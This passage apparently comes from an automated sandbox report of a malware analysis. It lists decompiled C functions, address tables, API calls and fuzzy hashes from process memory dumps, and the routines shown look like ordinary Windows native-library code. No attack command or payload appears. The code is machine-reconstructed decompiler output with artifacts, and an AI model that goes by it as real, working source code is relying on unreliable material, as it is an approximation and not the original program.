				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E033B4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E033DB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E033D98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					NtClose( *(_t62 + 4));
					L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x033cd29c
0x033cd2a6
0x033cd2b1
0x033cd2b5
0x033cd2b6
0x033cd2bc
0x033cd2bd
0x033cd2be
0x033cd2bf
0x033cd2c2
0x033cd2c4
0x033cd2cc
0x033cd384
0x033cd34b
0x033cd34f
0x033cd350
0x033cd351
0x033cd35c
0x033cd35c
0x033cd2d6
0x033cd2da
0x033cd2e1
0x033cd361
0x033cd369
0x033cd36d
0x033cd2e3
0x033cd2e3
0x033cd2e3
0x033cd2e5
0x033cd2ed
0x033cd2f5
0x033cd2fa
0x033cd302
0x033cd303
0x033cd30b
0x033cd30f
0x033cd313
0x033cd318
0x033cd31c
0x033cd320
0x033cd379
0x033cd37d
0x00000000
0x00000000
0x0340b001
0x0340b011
0x00000000
0x033cd322
0x033cd322
0x033cd330
0x033cd337
0x033cd35d
0x033cd339
0x033cd33f
0x033cd38c
0x033cd38c
0x033cd33f
0x033cd349
0x00000000
0x033cd349

APIs

NtClose.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(00000000,?,?,?,?), ref: 0340B001

Strings

@, xrefs: 033CD303

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001Close.0000001
String ID: @
API String ID: 971714608-2766056989
Opcode ID: b146f02b2623519c5e655f019b3229cdc65d8597da37e0254c948890802c2203
Instruction ID: 1c577acb5250eefd7ab3c70543fc820a9777e17a60256048b080f111ff1338fd
Opcode Fuzzy Hash: b146f02b2623519c5e655f019b3229cdc65d8597da37e0254c948890802c2203
Instruction Fuzzy Hash: DA31ADB69183859FC311DF28C9C0AABFBE8EF89654F04093EF99487650D634DD05CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0033443C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,0035731D,?,?,?,?,?), ref: 00334442

Part of subcall function 00334476: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 0033449A
Part of subcall function 00334476: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 003344BE
Part of subcall function 00334476: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 003344C9

Strings

%d.%d.%05d.%d, xrefs: 00334463

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseOpenQueryValueVersion
String ID: %d.%d.%05d.%d
API String ID: 2996790148-3457777122
Opcode ID: 01ad30b73e46ba425946e8ae66005dc425fcb8799961de3a36b2eb42205e340b
Instruction ID: 0691bb6fe78ed3f7d6cdf39dafe5a1f457b059a084cb2d4cfa966d6175cb35c4
Opcode Fuzzy Hash: 01ad30b73e46ba425946e8ae66005dc425fcb8799961de3a36b2eb42205e340b
Instruction Fuzzy Hash: 1CD02BB171012037D225266A0C8AF7B548DC6C8212F40452FF841AA2D3D8A96C1441B4

Uniqueness

Uniqueness Score: -1.00%

Function 0339C600, Relevance: 3.2, APIs: 2, Instructions: 225
nativeCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0339C600(void* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, long _a20, intOrPtr _a24) {
				signed int _v8;
				char _v1036;
				intOrPtr _v1040;
				void* _v1048;
				intOrPtr _v1056;
				long _v1060;
				void* _v1064;
				signed int _v1072;
				signed char _v1076;
				void* _v1078;
				long _v1080;
				void* _v1084;
				void* _v1088;
				long _v1092;
				void* _v1104;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t70;
				intOrPtr _t72;
				void* _t74;
				long _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				void* _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				void* _t116;
				void* _t117;
				long _t118;
				void* _t120;
				long _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x348d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E033A6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E033DB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x3487b9c; // 0x0
					_t74 = L033B4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_t122 = NtQueryValueKey(_t116,  &_v1048, 2, _t74, _t121,  &_v1060);
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1072;
									__eflags = _t78;
									if(_t78 != 0) {
										L033B77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1076;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1080 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1060;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E033DF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1080 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1076);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1076;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1080 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											_v1064 = _t42;
											 *((short*)(_t125 + 0x1c)) =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push(_t125 + 0x20);
											_t122 = E033D13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1092;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1076;
								_v1080 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *(_t102 + 0xc);
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1076;
							_v1080 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *(_t102 + 0xc);
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1080 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L033B77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1080;
					goto L19;
				}
				_t102 =  &_v1036;
				_t122 = NtQueryValueKey(_t116,  &_v1048, 2, _t102, 0x400,  &_v1060);
				if(_t122 >= 0) {
					__eflags = 0;
					_v1072 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x0339c608
0x0339c615
0x0339c625
0x0339c62d
0x0339c635
0x0339c640
0x0339c680
0x0339c687
0x0339c688
0x0339c689
0x0339c694
0x0339c694
0x0339c642
0x0339c64a
0x0339c697
0x03407a25
0x03407a2b
0x03407a2e
0x03407a30
0x03407bea
0x03407bea
0x00000000
0x03407bea
0x03407a36
0x03407a43
0x03407a48
0x03407a4c
0x03407a4e
0x00000000
0x00000000
0x03407a58
0x03407a6a
0x03407a6c
0x03407a6e
0x034079cb
0x034079cb
0x034079ce
0x034079d0
0x03407a98
0x03407a9b
0x03407a9b
0x03407a9e
0x03407aa1
0x03407bbe
0x03407bbe
0x03407bc0
0x03407be0
0x03407be0
0x03407a01
0x03407a01
0x03407a05
0x03407a07
0x03407a15
0x03407a15
0x03407a1a
0x00000000
0x03407a1a
0x03407bc2
0x03407bc6
0x03407bc9
0x03407bcd
0x03407bcf
0x034079e6
0x034079e6
0x034079eb
0x034079eb
0x034079ef
0x034079f1
0x00000000
0x00000000
0x034079f3
0x034079f5
0x034079ff
0x034079ff
0x00000000
0x034079ff
0x034079f7
0x034079fd
0x00000000
0x00000000
0x00000000
0x034079fd
0x03407bd5
0x03407bd8
0x00000000
0x00000000
0x03407ba9
0x03407bac
0x03407bb0
0x03407bb1
0x03407bb1
0x03407bb6
0x00000000
0x03407bb6
0x03407aa7
0x03407aaa
0x00000000
0x00000000
0x03407ab2
0x03407ab3
0x03407ab5
0x03407aec
0x03407aef
0x03407b25
0x03407b28
0x03407b62
0x03407b64
0x03407b8f
0x03407b92
0x03407b96
0x03407b98
0x00000000
0x00000000
0x03407b9e
0x03407b9f
0x03407ba3
0x00000000
0x03407ba3
0x03407b66
0x03407b68
0x03407ae2
0x03407ae2
0x00000000
0x03407ae2
0x03407b6e
0x03407b72
0x03407b75
0x03407b81
0x03407b85
0x03407b87
0x00000000
0x00000000
0x03407b31
0x03407b34
0x03407b3c
0x03407b45
0x03407b46
0x03407b4f
0x03407b51
0x03407b57
0x03407b59
0x03407b59
0x00000000
0x03407b59
0x03407b77
0x00000000
0x03407b77
0x03407b2a
0x00000000
0x03407b2a
0x03407af1
0x03407af3
0x00000000
0x00000000
0x03407afb
0x03407afc
0x03407afe
0x00000000
0x00000000
0x03407b00
0x03407b03
0x00000000
0x00000000
0x03407b05
0x03407b09
0x03407b0d
0x03407b0f
0x00000000
0x00000000
0x03407b18
0x03407b1d
0x00000000
0x03407b1d
0x03407ab7
0x03407ab9
0x00000000
0x00000000
0x03407abf
0x03407ac1
0x00000000
0x00000000
0x03407ac3
0x03407ac6
0x00000000
0x00000000
0x03407ac8
0x03407acc
0x03407ad0
0x03407ad2
0x00000000
0x00000000
0x03407adb
0x00000000
0x03407adb
0x034079d6
0x034079d9
0x034079dc
0x03407a91
0x03407a94
0x00000000
0x03407a94
0x034079e2
0x00000000
0x034079e2
0x03407a74
0x03407a7a
0x00000000
0x00000000
0x03407a8a
0x03407a21
0x03407a21
0x00000000
0x03407a21
0x0339c656
0x0339c66a
0x0339c66e
0x034079c5
0x034079c7
0x00000000
0x034079c7
0x0339c67a
0x00000000
0x00000000
0x00000000

APIs

NtQueryValueKey.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(00000000,?,00000002,?,00000400,?,?,?,?,?,00800000), ref: 0339C665
NtQueryValueKey.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(00000000,?,00000002,00000000,?,?,?,00800000), ref: 03407A65

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001Key.0000001QueryValue
String ID:
API String ID: 2112333492-0
Opcode ID: 293b7fe083a1a425f34ce3c677ef5db0a97a7bbb90f514261d1aea4cf6c0fbb1
Instruction ID: 6bbbf02b976d509deb88d38452889cf28455273d70b85e5ad9faf2073359f950
Opcode Fuzzy Hash: 293b7fe083a1a425f34ce3c677ef5db0a97a7bbb90f514261d1aea4cf6c0fbb1
Instruction Fuzzy Hash: 7D815C75B042059BDB25CE14C880A6BBBA9EB84354F19486BED959F380D331ED41CBAB

Uniqueness

Uniqueness Score: -1.00%

Function 03399240, Relevance: 3.1, APIs: 2, Instructions: 63
nativeCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E03399240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				long _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x346f708);
				E033ED08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					NtClose( *(__ecx + 0x24));
					 *(_t65 + 0x24) =  *(_t65 + 0x24) & 0x00000000;
				}
				L6();
				L6();
				NtClose( *(_t65 + 0x28));
				_t33 =  *0x34884c4; // 0x0
				L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x34884c4; // 0x0
				L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x34884c4; // 0x0
				E033B2280(L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x34886b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					NtClose( *_t23);
					_t24 = _t66 + 0x10; // 0x89e04d8b
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = NtClose( *_t24);
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E03399325();
					_t50 =  *0x34884c4; // 0x0
					return E033ED0D1(L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x03399240
0x03399242
0x03399247
0x0339924c
0x0339924e
0x03399255
0x0339925a
0x0339925f
0x0339925f
0x03399266
0x03399271
0x03399279
0x0339927e
0x03399295
0x0339929a
0x033992b1
0x033992b6
0x033992d7
0x033992dc
0x033992e0
0x033992e6
0x033992e8
0x033992ee
0x03399332
0x03399333
0x03399337
0x03399338
0x0339933a
0x0339933d
0x03399342
0x03399345
0x03399349
0x0339934e
0x03399352
0x03399357
0x033992f4
0x033992f4
0x033992f6
0x033992f9
0x03399300
0x03399306
0x03399324
0x03399324

APIs

NtClose.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(00000000,0346F708,0000000C,03399219,?,0346F6E8,0000002C,034885EC,?,?,0000000A,033AF0D7,?,?,0000000A,033D6EEB), ref: 0339925A

Part of subcall function 033D95D0: LdrInitializeThunk.0000001A.00000002.476687065.0000000003370000.00000040.00000001. ref: 033D95DA

NtClose.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(00000000,0346F708,0000000C,03399219,?,0346F6E8,0000002C,034885EC,?,?,0000000A,033AF0D7,?,?,0000000A,033D6EEB), ref: 03399279

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001$Close.0000001$InitializeThunk.0000001
String ID:
API String ID: 3833957198-0
Opcode ID: 65a1692a531c771107af7646f2b567b6c2f78afe857cbd9950b74b1cd438a9da
Instruction ID: 460865149015d818b6e0d90398faf2b6f5bc6413e47b526b64d665a7e2bf9c7b
Opcode Fuzzy Hash: 65a1692a531c771107af7646f2b567b6c2f78afe857cbd9950b74b1cd438a9da
Instruction Fuzzy Hash: 56215936440640DFC721EF28CA81F5AB7F9FF08704F58466DE1499EAA2DB34E941CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00353C49, Relevance: 3.0, APIs: 2, Instructions: 43timeCOMMON

Download Yara Rule

APIs

GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000000,?,00349AFE,0035F830,?,00002000), ref: 00353C66
SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?,00000000,?,00349AFE,0035F830,?,00002000), ref: 00353CB2

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Time$System$File
String ID:
API String ID: 2838179519-0
Opcode ID: c7216cb6722afb289da91f7a61e9390a33187092ffcca910402e7f84fd7b5482
Instruction ID: 9fe290f09ded1284b82e179cc552094aa3d9c27aa4c1c295ffe1d7b44690c7f6
Opcode Fuzzy Hash: c7216cb6722afb289da91f7a61e9390a33187092ffcca910402e7f84fd7b5482
Instruction Fuzzy Hash: 2601402C910249AACB04EFE4D5045EEB378EF18704B20549AEC19E7721E7328E47C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 03465BA5, Relevance: 2.1, APIs: 1, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E03465BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x3471178);
				E033ED0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E03464C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E033DD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E03465542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x34860e8;
								if( *0x34860e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x34860e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E033D9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E033D6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
